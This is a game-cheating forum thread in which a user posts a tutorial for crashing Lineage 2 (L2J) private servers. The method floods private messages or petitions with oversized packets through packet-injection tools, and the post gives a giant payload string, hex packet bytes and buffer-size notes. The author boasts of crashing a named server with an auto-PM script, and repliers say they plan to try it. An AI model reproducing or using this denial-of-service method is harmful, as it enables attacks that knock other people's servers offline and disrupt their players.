[SHARE]Crashing L2J servers. Simple but deadly.

[mpj123]

Hurry and patch your servers! Lol.

 

Step One, Download either phx, l2.net or any program that can inject packets.

 

(This tutorial will be done with l2.net)

 

Step two, figuring out the weak point.

Try out every chat option and figure out which ones don't have a character limit. Most l2j servers have normal chat and shout limited. For me, I simply needed to pm someone with a large amount of characters.

 

"noob gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggAAAAAAAAAAAAAAAAAAAAAAAAAWWWWWWWWWWWWWWWWWWWWWEEEEEEEEEEEEEEEE

! gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggAAAAAAAAAAAAAAAAAAAAAAAAAWWWWWWWWWWWWWWWWWWWWWEEEEEEEEEEEEEEEE

# gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggAAAAAAAAAAAAAAAAAAAAAAAAAWWWWWWWWWWWWWWWWWWWWWEEEEEEEEEEEEEEEE

@ gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggAAAAAAAAAAAAAAAAAAAAAAAAAWWWWWWWWWWWWWWWWWWWWWEEEEEEEEEEEEEEEE

 

etc.

 

If the characters get cur off, then you know that chat filter is working and you wont be able to crash the server with that chat option.

 

Example, lets say the pms weren't patched (all l2j server packs dont have this patched at first if I remember correctly.)

 

Simply copy paste this into the l2.net chat window and tada! You should get disconnected as well, because your client will work hard to send this message. The server will go into a lockdown because it is trying to decrypt the message and cause every one else to lag. Keep loging into OOG l2.net and pasting this packet until the server crashes. It took me 5 messages with 5 different clients to crash my server. (l2inc)

"SomeRandomNub gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg

 

You could even try gm petition systems as well. (Petition worked on l2inc, this is why the server was crashing alot last night. Its fixed now.)

 

 

 

With l2phx, You'll need to capture the packet, for example, firstly send something simple such as aaaaaaaaa, this should come up with XX 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00

 

copy 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00  over and over again to make the packet bigger.

 

XX 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00

 

NOTE, XX is the packet lenght, this is calculated automatically with l2.net, with l2phx, you might need to figure it out by yourself.

 

NOTE2, The amount of characters has to exceed the amount the l2j server can buffer. Default is something low like 4 k.... l2.net can take up to like 50k.

 

Credits to Test from ltwonet.com for the idea, I simply took it a few notches bigger, specially with my auto-pm script. That really caused some damage :P

[DreaM]

I think you should hide for a bit more posts, since there are a lot of leechers i don't wanna see it fixed.

[blubb]

nice post.

 

tried it out but it doesnt works on my server or i did something wrong

[Deanok]

Already Posted by Dragoniux. Topic should be locked and post account = 250.

[Fragas]

this is for l2net, mine is for phx.

[Armind]

thx for share.. muhahaha

[Vago]

Oh nice one...I already fixed that on my server xD

[mpj123]

dragoniux's is similar but this is for l2.net and I explain exactly what I'm doing and why its working. I'll raise the post count to 250.

[WebM0nst3r]

it's really cool.

L2 client can accept only 100 characets, so when you send more than 100 characters to client every person who see the message get a critical error ;)

[EtEяNiTy™]

nice work-really impressing thought I wouldnt ever crash a server. Those who do these kinds of things are jealous of other people.

[DreaM]

what is l2.net?

a program

nice work-really impressing thought I wouldnt ever crash a server. Those who do these kinds of things are jealous of other people.

 

we are max cheaters unlike you.

[™Dariuse®]

NICE mpj123 now you hide .....250 posts need to see but i see it..Gj

what is l2.net?

hahahha Professional Cheater and don't know what is l2net. pfffff ...YOU ARE A Professional Cheater on forum,but don't know some programs...

[Lain]

Thanks mpj123! I'll try this on L2J Interlude.

 

And you guys, stop that hardcore flame. :<

[mpj123]

virusa banned, -4 karma and still flamming.

 

This is similar to dragonix, but my main focus and selling point was that this was done through pms. And a large number of characters to overwhelm the l2j server's buffer and crash the server.

 

I personally dont like these kinds of exploits. Was kinda just a fluke that I found it/tested it. I'd rather see servers getting it patched then 1000 people using it to constantly crash servers.